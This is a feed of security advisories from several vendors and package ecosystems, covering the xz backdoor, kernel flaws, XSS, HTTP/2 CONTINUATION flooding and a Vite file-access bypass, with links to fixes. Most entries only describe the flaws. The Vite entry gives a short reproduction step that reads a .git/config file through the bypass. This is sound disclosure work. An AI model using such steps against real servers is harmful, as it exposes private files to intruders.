29.03.2024 19:15:21	alpinelinux	[ALPINE:CVE-2024-3094] xz vulnerability (critical)	[From CVE-2024-3094] Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-3094
29.03.2024 17:58:07	maven	[MAVEN:GHSA-PW39-F3M5-CXFC] Elasticsearch Uncaught Exception leading to crash (moderate)	An uncaught exception in Elasticsearch >= 8.4.0 and < 8.11.1 occurs when an encrypted PDF is passed to an attachment processor through the REST API. The Elasticsearch ingest node that attempts to parse the PDF file will crash. This does not happen with password-protected PDF files or with unencrypted PDF files.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-PW39-F3M5-CXFC
31.03.2024 02:00:00	debian	[DSA-5650-1] util-linux	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5650-1
31.03.2024 02:00:00	debian	[DSA-5651-1] mediawiki	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5651-1
31.03.2024 17:44:37	rustsec	[RUSTSEC-2024-0331] Puccinier is unmainted.	The tool has been deprecated in favor of Catppuccin's new tool, [whiskers](https://github.com/catppuccin/toolbox/tree/main/whiskers) [(crates.io)](https://crates.io/crates/catppuccin-whiskers).	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0331
30.03.2024 21:01:00	opensuse	[openSUSE-SU-2024:0095-1] Security update for kanidm (moderate)	Security update for kanidm	https://secdb.nttzen.cloud/security-advisory/opensuse/openSUSE-SU-2024:0095-1
01.04.2024 23:33:53	npm	[NPM:GHSA-C4GR-Q97G-PPWC] In Astro-Shield, setting a correct `integrity` attribute to injected code allows to bypass the allow-lists (high)	### ImpactVersions from 1.2.0 to 1.3.1 of Astro-Shield allow to bypass the allow-lists for cross-origin resources by introducing valid `integrity` attributes to the injected code. This implies that the injected SRI hash would be added to the generated CSP header, which would lead the browser to believe that the injected resource is legit.To exploit this vulnerability, the attacker needs to first inject code into the rendered pages by exploiting other not-related potential vulnerabilities.### PatchesVersion [1.3.2](https://github.com/kindspells/astro-shield/releases/tag/1.3.2) provides a patch.### Workarounds- To not use the middleware functionality of Astro-Shield.- To use the middleware functionality of Astro-Shield ONLY for content that cannot be controlled in any way by external users.### References_Are there any links users can visit to find out more?_	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-C4GR-Q97G-PPWC
02.04.2024 02:02:56	maven	[MAVEN:GHSA-R65J-6H5F-4F92] JJWT improperly generates signing keys (moderate)	JJWT (aka Java JWT) through 0.12.5 ignores certain characters and thus a user might falsely conclude that they have a strong key. The impacted code is the setSigningKey() method within the DefaultJwtParser class and the signWith() method within the DefaultJwtBuilder class.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-R65J-6H5F-4F92
01.04.2024 18:52:51	maven	[MAVEN:GHSA-8VJ9-5V5Q-FHCH] Bonita cross-site scripting vulnerability (moderate)	Bonita before 10.1.0.W11 allows stored XSS via a UI screen in the administration panel.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8VJ9-5V5Q-FHCH
01.04.2024 03:00:00	redhat	[RHSA-2024:1576] ruby:3.1 security, bug fix, and enhancement update (moderate)	Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.The following packages have been upgraded to a later upstream version: ruby (3.1). (RHEL-29052)Security Fix(es):* ruby/cgi-gem: HTTP response splitting in CGI (CVE-2021-33621)* ruby: ReDoS vulnerability in URI (CVE-2023-28755)* ruby: ReDoS vulnerability - upstream's incomplete fix for CVE-2023-28755 (CVE-2023-36617)* ruby: ReDoS vulnerability in Time (CVE-2023-28756)Bug Fix(es):* ruby/rubygem-irb: IRB has hard dependency on rubygem-rdoc (RHEL-29048)* ruby: Ruby cannot read private key in FIPS mode on RHEL 9 (RHEL-12437)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1576
01.04.2024 10:00:00	msrc	[MS:CVE-2024-2883] Chromium: CVE-2024-2883 Use after free in ANGLE		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2883
02.04.2024 20:01:26	go	[GO-2024-2668] Login username enumeration in github.com/IceWhaleTech/CasaOS-UserService (medium)	The Casa OS Login page has a username enumeration vulnerability in thelogin page that was patched in Casa OS v0.4.7. The issue exists becausethe application response differs depending on whether the username orpassword is incorrect, allowing an attacker to enumerate usernames byobserving the application response. For example, if the username isincorrect, the application returns "User does not exist" with returncode "10006", while if the password is incorrect, it returns"User does not exist or password is invalid" with return code "10013".This allows an attacker to determine if a username exists without knowingthe password.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2668
02.04.2024 14:41:26	ubuntu	[USN-6720-1] Cacti vulnerability (critical)	Cacti could be made to crash if it received specially craftedinput.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6720-1
02.04.2024 19:15:48	maven	[MAVEN:GHSA-9PH3-V2VH-3QX7] Eclipse Vert.x vulnerable to a memory leak in TCP servers (moderate)	A vulnerability in the Eclipse Vert.x toolkit causes a memory leak in TCP servers configured with TLS and SNI support. When processing an unknown SNI server name assigned the default certificate instead of a mapped certificate, the SSL context is erroneously cached in the server name map, leading to memory exhaustion. This flaw allows attackers to send TLS client hello messages with fake server names, triggering a JVM out-of-memory error.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9PH3-V2VH-3QX7
02.04.2024 12:11:24	composer	[PHP:CAUSAL-OIDC-2024-30173] TYPO3-EXT-SA-2024-002: Authentication Bypass in "OpenID Connect Authentication" (oidc)		https://secdb.nttzen.cloud/security-advisory/composer/PHP:CAUSAL-OIDC-2024-30173
02.04.2024 03:00:00	debian	[DSA-5652-1] py7zr (critical)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5652-1
02.04.2024 03:00:00	oraclelinux	[ELSA-2024-12257] Unbreakable Enterprise kernel security update (important)	[4.14.35-2047.534.3.1]- netfilter: nf_tables: reject QUEUE/DROP verdict parameters (Florian Westphal) [Orabug: 36251145] {CVE-2024-1086}	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12257
02.04.2024 03:00:00	oraclelinux	[ELSA-2024-12259] Unbreakable Enterprise kernel-container security update (important)	[5.4.17-2136.329.3.2.el7]- netfilter: nf_tables: reject QUEUE/DROP verdict parameters (Florian Westphal) [Orabug: 36465920] {CVE-2024-1086}	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12259
02.04.2024 03:00:00	oraclelinux	[ELSA-2024-12260] Unbreakable Enterprise kernel-container security update (important)	[5.4.17-2136.329.3.2.el8]- netfilter: nf_tables: reject QUEUE/DROP verdict parameters (Florian Westphal) [Orabug: 36465920] {CVE-2024-1086}	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12260
02.04.2024 03:00:00	redhat	[RHSA-2024:1610] less security update (moderate)	The "less" utility is a text file browser that resembles "more", but allows users to move backwards in the file as well as forwards. Since "less" does not read the entire input file at startup, it also starts more quickly than ordinary text editors.Security Fix(es):* less: missing quoting of shell metacharacters in LESSCLOSE handling (CVE-2022-48624)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1610
02.04.2024 03:00:00	redhat	[RHSA-2024:1612] kpatch-patch security update (important)	This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.Security Fix(es):* kernel: GSM multiplexing race condition leads to privilege escalation (CVE-2023-6546)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1612
02.04.2024 03:00:00	redhat	[RHSA-2024:1615] expat security update (moderate)	Expat is a C library for parsing XML documents.Security Fix(es):* expat: parsing large tokens can trigger a denial of service (CVE-2023-52425)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1615
02.04.2024 03:00:00	redhat	[RHSA-2024:1644] grafana-pcp security and bug fix update (important)	The Grafana plugin for Performance Co-Pilot includes datasources for scalable time series from pmseries and Redis, live PCP metrics and bpftrace scripts from pmdabpftrace, as well as several dashboards.Security Fix(es):* golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394)Bug Fix(es):* TRIAGE CVE-2024-1394 grafana-pcp: golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (JIRA:RHEL-30544)	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1644
02.04.2024 03:00:00	redhat	[RHSA-2024:1646] grafana security and bug fix update (important)	Grafana is an open source, feature rich metrics dashboard and graph editor for Graphite, InfluxDB & OpenTSDB. Security Fix(es):* golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394)Bug Fix(es):* TRIAGE CVE-2024-1394 grafana: golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (JIRA:RHEL-30543)	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1646
02.04.2024 03:00:00	oraclelinux	[ELSA-2024-12261] olcne security update (important)	[1.8.1-2]- Cleanup spec file[1.8.1-1]- Fix OLM upgrade failure - upgrade from 0.17.0 to 0.23.1 failed due to a couple of crds missing- Add hostpathRequiresPrivilged value to rook template cr to be passed to module operator- Fixed Istio-1.18 and Istio-1.19 installation on aarch64 architecture- Fixed unable to deploy new module(s) using config file containing already existing modules- Corrected olcne repo version in the prompt text of the 'olcnectl provision' command- Update modules and components built with golang 1.20.12 to address CVE-2023-39326- add conmon resource to kubernetes module- Fix OLM upgrade failure - same version upgrade failure- Migrate ModuleOperator from verrazzano-install to ocne-modules namespace- Fix multiple install during provision	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12261
02.04.2024 03:00:00	oraclelinux	[ELSA-2024-12262] olcne security update (important)	[1.8.1-2]- Cleanup spec file[1.8.1-1]- Fix OLM upgrade failure - upgrade from 0.17.0 to 0.23.1 failed due to a couple of crds missing- Add hostpathRequiresPrivilged value to rook template cr to be passed to module operator- Fixed Istio-1.18 and Istio-1.19 installation on aarch64 architecture- Fixed unable to deploy new module(s) using config file containing already existing modules- Corrected olcne repo version in the prompt text of the 'olcnectl provision' command- Update modules and components built with golang 1.20.12 to address CVE-2023-39326- add conmon resource to kubernetes module- Fix OLM upgrade failure - same version upgrade failure- Migrate ModuleOperator from verrazzano-install to ocne-modules namespace- Fix multiple install during provision	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12262
02.04.2024 03:00:00	oraclelinux	[ELSA-2024-12263] olcne security update (important)	[1.8.1-2]- Cleanup spec file[1.8.1-1]- Fix OLM upgrade failure - upgrade from 0.17.0 to 0.23.1 failed due to a couple of crds missing- Add hostpathRequiresPrivilged value to rook template cr to be passed to module operator- Fixed Istio-1.18 and Istio-1.19 installation on aarch64 architecture- Fixed unable to deploy new module(s) using config file containing already existing modules- Corrected olcne repo version in the prompt text of the 'olcnectl provision' command- Update modules and components built with golang 1.20.12 to address CVE-2023-39326- add conmon resource to kubernetes module- Fix OLM upgrade failure - same version upgrade failure- Migrate ModuleOperator from verrazzano-install to ocne-modules namespace- Fix multiple install during provision	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12263
02.04.2024 03:00:00	oraclelinux	[ELSA-2024-12264] olcne security update (important)	[1.8.1-2]- Cleanup spec file[1.8.1-1]- Fix OLM upgrade failure - upgrade from 0.17.0 to 0.23.1 failed due to a couple of crds missing- Add hostpathRequiresPrivilged value to rook template cr to be passed to module operator- Fixed Istio-1.18 and Istio-1.19 installation on aarch64 architecture- Fixed unable to deploy new module(s) using config file containing already existing modules- Corrected olcne repo version in the prompt text of the 'olcnectl provision' command- Update modules and components built with golang 1.20.12 to address CVE-2023-39326- add conmon resource to kubernetes module- Fix OLM upgrade failure - same version upgrade failure- Migrate ModuleOperator from verrazzano-install to ocne-modules namespace- Fix multiple install during provision	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12264
02.04.2024 03:00:00	oraclelinux	[ELSA-2024-1576] ruby:3.1 security, bug fix, and enhancement update (moderate)	ruby[3.1.4-143]- Upgrade to Ruby 3.1.4. Resolves: RHEL-5586- Fix HTTP response splitting in CGI. Resolves: RHEL-5591- Fix ReDos vulnerability in URI. Resolves: RHEL-28919 Resolves: RHEL-5612- Fix ReDos vulnerability in Time. Resolves: RHEL-28920- Make RDoc soft dependency in IRB. Resolves: RHEL-5613[3.1.2-142]- Bypass git submodule test failure on Git >= 2.38.1.- Fix tests with Europe/Amsterdam pre-1970 time on tzdata version 2022b.- Fix for tzdata-2022g.- Fix OpenSSL.fips_mode and OpenSSL::PKey.read in OpenSSL 3 FIPS. Resolves: RHEL-5590- ssl: use ffdhe2048 from RFC 7919 as the default DH group parameters Related: RHEL-5590- Disable fiddle tests that use FFI closures. Related: RHEL-5590rubygem-mysql2[0.5.4-1]- New upstream release 0.5.4 by merging Fedora rawhide branch (commit: e21b5b9) Resolves: rhbz#2063773[0.5.3-1]- New upstream release 0.5.3 by merging Fedora master branch (commit: 674d475) Resolves: rhbz#1817135rubygem-pg[1.3.5-1]- Update to pg 1.3.5 Related: rhbz#2063773[1.2.3-1]- Update to pg 1.2.3 by merging Fedora master branch (commit: 5db4d26) Resolves: rhbz#1817135	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1576
02.04.2024 03:00:00	redhat	[RHSA-2024:1601] curl security and bug fix update (moderate)	The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP.Security Fix(es):* curl: information disclosure by exploiting a mixed case flaw (CVE-2023-46218)* curl: more POST-after-PUT confusion (CVE-2023-28322)* curl: cookie injection with none file (CVE-2023-38546)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Bug Fix(es):* libssh (curl sftp) not trying password auth (BZ#2240033)* libssh: cap SFTP packet size sent (RHEL-5485)	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1601
02.04.2024 03:00:00	redhat	[RHSA-2024:1607] kernel security, bug fix, and enhancement update (important)	The kernel packages contain the Linux kernel, the core of any Linux operating system.Security Fix(es):* kernel: vmwgfx: NULL pointer dereference in vmw_cmd_dx_define_query (CVE-2022-38096)* kernel: Out of boundary write in perf_read_group() as result of overflow a perf_event's read_size (CVE-2023-6931)* kernel: GSM multiplexing race condition leads to privilege escalation (CVE-2023-6546,ZDI-CAN-20527)* kernel: CIFS Filesystem Decryption Improper Input Validation Remote Code Execution Vulnerability in function receive_encrypted_standard of client (CVE-2024-0565)* kernel: use-after-free in amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c (CVE-2023-51042)* kernel: ext4: kernel bug in ext4_write_inline_data_end() (CVE-2021-33631)* kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function (CVE-2024-1086)Bug Fix(es):* OCP 4.12 crashed due to use-after-free in libceph in rhel8 (JIRA:RHEL-21394)* kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function (JIRA:RHEL-24010)* Screen floods with random colour suggesting something not initialised (JIRA:RHEL-21055)* kernel: vmxgfx: NULL pointer dereference in vmw_cmd_dx_define_query (JIRA:RHEL-22766)* tx-checksumming required for accessing port in OpenShift for RHEL 8.6 (JIRA:RHEL-20822)* kernel: CIFS Filesystem Decryption Improper Input Validation Remote Code Execution Vulnerability in function receive_encrypted_standard of client (JIRA:RHEL-22077)* kernel: Out of boundary write in perf_read_group() as result of overflow a perf_event's read_size (JIRA:RHEL-22930)* rbd: don't move requests to the running list on errors [8.x] (JIRA:RHEL-24204)* kernel: use-after-free in amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c (JIRA:RHEL-24479)* ceph: several cap and snap fixes (JIRA:RHEL-20909)* [RHVH] Migration hangs between RHVH release bellow 4.5.1 and RHVH over or equal 4.5.2 release (JIRA:RHEL-23063)* unable to access smsc95xx based interface unless you start outgoing traffic. (JIRA:RHEL-25719)* [RHEL8] ] BUG bio-696 (Not tainted): Poison overwritten (JIRA:RHEL-26101)* kernel: GSM multiplexing race condition leads to privilege escalation (JIRA:RHEL-19954)* backport smartpqi: fix disable_managed_interrupts (JIRA:RHEL-26139)* kernel: ext4: kernel bug in ext4_write_inline_data_end() (JIRA:RHEL-26331)* ceph: always check dir caps asynchronously (JIRA:RHEL-27496)Enhancement(s):* [IBM 8.10 FEAT] Upgrade the qeth driver to latest from upstream, e.g. kernel 6.4 (JIRA:RHEL-25811)	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1607
02.04.2024 03:00:00	redhat	[RHSA-2024:1608] opencryptoki security update (moderate)	The opencryptoki packages contain version 2.11 of the PKCS#11 API, implemented for IBM Cryptocards, such as IBM 4764 and 4765 crypto cards. These packages includes support for the IBM 4758 Cryptographic CoProcessor (with the PKCS#11 firmware loaded), the IBM eServer Cryptographic Accelerator (FC 4960 on IBM eServer System p), the IBM Crypto Express2 (FC 0863 or FC 0870 on IBM System z), and the IBM CP Assist for Cryptographic Function (FC 3863 on IBM System z). The opencryptoki packages also bring a software token implementation that can be used without any cryptographic hardware. These packages contain the Slot Daemon (pkcsslotd) and general utilities.Security Fix(es):* opencryptoki: timing side-channel in handling of RSA PKCS#1 v1.5 padded ciphertexts (Marvin) (CVE-2024-0914)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1608
02.04.2024 03:00:00	redhat	[RHSA-2024:1614] kernel-rt security and bug fix update (important)	The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.Security Fix(es):* kernel: vmwgfx: NULL pointer dereference in vmw_cmd_dx_define_query (CVE-2022-38096)* kernel: Out of boundary write in perf_read_group() as result of overflow a perf_event's read_size (CVE-2023-6931)* kernel: GSM multiplexing race condition leads to privilege escalation (CVE-2023-6546,ZDI-CAN-20527)* kernel: CIFS Filesystem Decryption Improper Input Validation Remote Code Execution Vulnerability in function receive_encrypted_standard of client (CVE-2024-0565)* kernel: use-after-free in amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c (CVE-2023-51042)* kernel: ext4: kernel bug in ext4_write_inline_data_end() (CVE-2021-33631)* kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function (CVE-2024-1086)Bug Fix(es):* kernel-rt: update RT source tree to the latest RHEL-8.9.z3 Batch (JIRA:RHEL-23853)* kernel-rt: kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function (JIRA:RHEL-24015)* kernel-rt: kernel: vmxgfx: NULL pointer dereference in vmw_cmd_dx_define_query (JIRA:RHEL-22758)* kernel-rt: kernel: CIFS Filesystem Decryption Improper Input Validation Remote Code Execution Vulnerability in function receive_encrypted_standard of client (JIRA:RHEL-22080)* kernel-rt: kernel: Out of boundary write in perf_read_group() as result of overflow a perf_event's read_size (JIRA:RHEL-22933)* kernel-rt: kernel: use-after-free in amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c (JIRA:RHEL-24498)* kernel-rt: kernel: GSM multiplexing race condition leads to privilege escalation (JIRA:RHEL-19966)* kernel-rt: kernel: ext4: kernel bug in ext4_write_inline_data_end() (JIRA:RHEL-26334)	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1614
02.04.2024 03:00:00	vmware	[VMSA-2024-0008] VMware SD-WAN Edge and SD-WAN Orchestrator updates address multiple security vulnerabilities. (important)		https://secdb.nttzen.cloud/security-advisory/vmware/VMSA-2024-0008
02.04.2024 17:40:46	android	[ASB-A-218495634] Lockdown vs. Screen pinning mode (high)	In multiple functions of KeyguardViewMediator.java, there is a possible way to bypass lockdown mode with screen pinning due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.	https://secdb.nttzen.cloud/security-advisory/android/ASB-A-218495634
04.04.2024 01:25:44	slackware	[SSA:2024-094-01] xorg-server	New xorg-server packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/xorg-server-1.20.14-i586-12_slack15.0.txz: Rebuilt. This update fixes security issues: Heap buffer overread/data leakage in ProcXIGetSelectedEvents. Heap buffer overread/data leakage in ProcXIPassiveGrabDevice. Heap buffer overread/data leakage in ProcAppleDRICreatePixmap. Use-after-free in ProcRenderAddGlyphs. For more information, see: https://lists.x.org/archives/xorg-announce/2024-April/003497.html https://www.cve.org/CVERecord?id=CVE-2024-31080 https://www.cve.org/CVERecord?id=CVE-2024-31081 https://www.cve.org/CVERecord?id=CVE-2024-31082 https://www.cve.org/CVERecord?id=CVE-2024-31083 (* Security fix )patches/packages/xorg-server-xephyr-1.20.14-i586-12_slack15.0.txz: Rebuilt.patches/packages/xorg-server-xnest-1.20.14-i586-12_slack15.0.txz: Rebuilt.patches/packages/xorg-server-xvfb-1.20.14-i586-12_slack15.0.txz: Rebuilt.patches/packages/xorg-server-xwayland-21.1.4-i586-11_slack15.0.txz: Rebuilt. This update fixes security issues: Heap buffer overread/data leakage in ProcXIGetSelectedEvents. Heap buffer overread/data leakage in ProcXIPassiveGrabDevice. Use-after-free in ProcRenderAddGlyphs. For more information, see: https://lists.x.org/archives/xorg-announce/2024-April/003497.html https://www.cve.org/CVERecord?id=CVE-2024-31080 https://www.cve.org/CVERecord?id=CVE-2024-31081 https://www.cve.org/CVERecord?id=CVE-2024-31083 ( Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-1.20.14-i586-12_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xephyr-1.20.14-i586-12_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xnest-1.20.14-i586-12_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xvfb-1.20.14-i586-12_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xwayland-21.1.4-i586-11_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-1.20.14-x86_64-12_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xephyr-1.20.14-x86_64-12_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xnest-1.20.14-x86_64-12_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xvfb-1.20.14-x86_64-12_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xwayland-21.1.4-x86_64-11_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-21.1.12-i586-1.txzftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xephyr-21.1.12-i586-1.txzftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xnest-21.1.12-i586-1.txzftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xvfb-21.1.12-i586-1.txzftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xwayland-23.2.5-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-21.1.12-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xephyr-21.1.12-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xnest-21.1.12-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xvfb-21.1.12-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xwayland-23.2.5-x86_64-1.txzMD5 signaturesSlackware 15.0 package:1f603c1368faa820d0f975f411ae0c41 xorg-server-1.20.14-i586-12_slack15.0.txze59f8ec76a3828ac1d49c435df072f66 xorg-server-xephyr-1.20.14-i586-12_slack15.0.txz0ad3a7c8479c3b61ea0942b94efd27a3 xorg-server-xnest-1.20.14-i586-12_slack15.0.txz212359a07f94f51ee5848eb4825b22ce xorg-server-xvfb-1.20.14-i586-12_slack15.0.txzca7ee08a54569f4f23822084014bf83e xorg-server-xwayland-21.1.4-i586-11_slack15.0.txzSlackware x86_64 15.0 package:e35adc6f3ddd2a626d45464363b62efe xorg-server-1.20.14-x86_64-12_slack15.0.txzd096a062758d94dfd89a553c4c28cf61 xorg-server-xephyr-1.20.14-x86_64-12_slack15.0.txzab02a77825ee590502740921bcef813d xorg-server-xnest-1.20.14-x86_64-12_slack15.0.txz8f258e0b0463e213d88e0d91cf5ac7b1 xorg-server-xvfb-1.20.14-x86_64-12_slack15.0.txz8e89a0d891fc3c61c9a9a62438563dec xorg-server-xwayland-21.1.4-x86_64-11_slack15.0.txzSlackware -current package:d8b62a448a2c21fbf5b2dcc53e6d6f0e x/xorg-server-21.1.12-i586-1.txz7ded182f2c4402184b304bf57a069ebd x/xorg-server-xephyr-21.1.12-i586-1.txz6817075f09d7da8fa97a38251c7ed057 x/xorg-server-xnest-21.1.12-i586-1.txz1ed9e41bbe460a7b64f67e29a7087061 x/xorg-server-xvfb-21.1.12-i586-1.txz1d6e03918c4b9c8e0cd11ee2b016ba6a x/xorg-server-xwayland-23.2.5-i586-1.txzSlackware x86_64 -current package:6a042c5acf3008fe81acdb99b4f18888 x/xorg-server-21.1.12-x86_64-1.txz1b08420cdbb14f976ed8b64864e69c01 x/xorg-server-xephyr-21.1.12-x86_64-1.txzdf2d61f8872c9506951cf929a4267689 x/xorg-server-xnest-21.1.12-x86_64-1.txz2b5fb68e19b9570fcbdc0cdf2f223ceb x/xorg-server-xvfb-21.1.12-x86_64-1.txzb3603890c6a3db5695711abd59a74add x/xorg-server-xwayland-23.2.5-x86_64-1.txzInstallation instructionsUpgrade the package as root:`# upgradepkg xorg-server-.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-094-01
03.04.2024 20:40:45	go	[GO-2024-2687] HTTP/2 CONTINUATION flood in net/http	An attacker may cause an HTTP/2 endpoint to read arbitrary amounts of headerdata by sending an excessive number of CONTINUATION frames.Maintaining HPACK state requires parsing and processing all HEADERS andCONTINUATION frames on a connection. When a request's headers exceedMaxHeaderBytes, no memory is allocated to store the excess headers, but they arestill parsed.This permits an attacker to cause an HTTP/2 endpoint to read arbitrary amountsof header data, all associated with a request which is going to be rejected.These headers can include Huffman-encoded data which is significantly moreexpensive for the receiver to decode than for an attacker to send.The fix sets a limit on the amount of excess header frames we will processbefore closing a connection.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2687
03.04.2024 23:34:58	npm	[NPM:GHSA-8JHW-289H-JH2G] Vite's `server.fs.deny` did not deny requests for patterns with directories. (moderate)	### Summary[Vite dev server option](https://vitejs.dev/config/server-options.html#server-fs-deny) `server.fs.deny` did not deny requests for patterns with directories. An example of such a pattern is `/foo/*/`.### ImpactOnly apps setting a custom `server.fs.deny` that includes a pattern with directories, and explicitly exposing the Vite dev server to the network (using `--host` or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.### PatchesFixed in vite@5.2.6, vite@5.1.7, vite@5.0.13, vite@4.5.3, vite@3.2.10, vite@2.9.18### Details`server.fs.deny` uses picomatch with the config of `{ matchBase: true }`. [matchBase](https://github.com/micromatch/picomatch/blob/master/README.md#options:~:text=Description-,basename,-boolean) only matches the basename of the file, not the path due to a bug (https://github.com/micromatch/picomatch/issues/89). The vite config docs read like you should be able to set fs.deny to glob with picomatch. Vite also does not set `{ dot: true }` and that causes [dotfiles not to be denied](https://github.com/micromatch/picomatch/blob/master/README.md#options:~:text=error%20is%20thrown.-,dot,-boolean) unless they are explicitly defined.ReproductionSet fs.deny to `['/.git/']` and then curl for `/.git/config`.* with `matchBase: true`, you can get any file under `.git/` (config, HEAD, etc).* with `matchBase: false`, you cannot get any file under `.git/` (config, HEAD, etc).	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-8JHW-289H-JH2G
03.04.2024 19:00:00	cisco	[CISCO-SA-CEM-CSRF-SUCMNJFR] Cisco Emergency Responder Cross-Site Request Forgery and Directory Traversal Vulnerabilities (medium)	Multiple vulnerabilities in Cisco Emergency Responder could allow an attacker to conduct a cross-site request forgery (CSRF) or directory traversal attack, which could allow the attacker to perform arbitrary actions on an affected device.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CEM-CSRF-SUCMNJFR
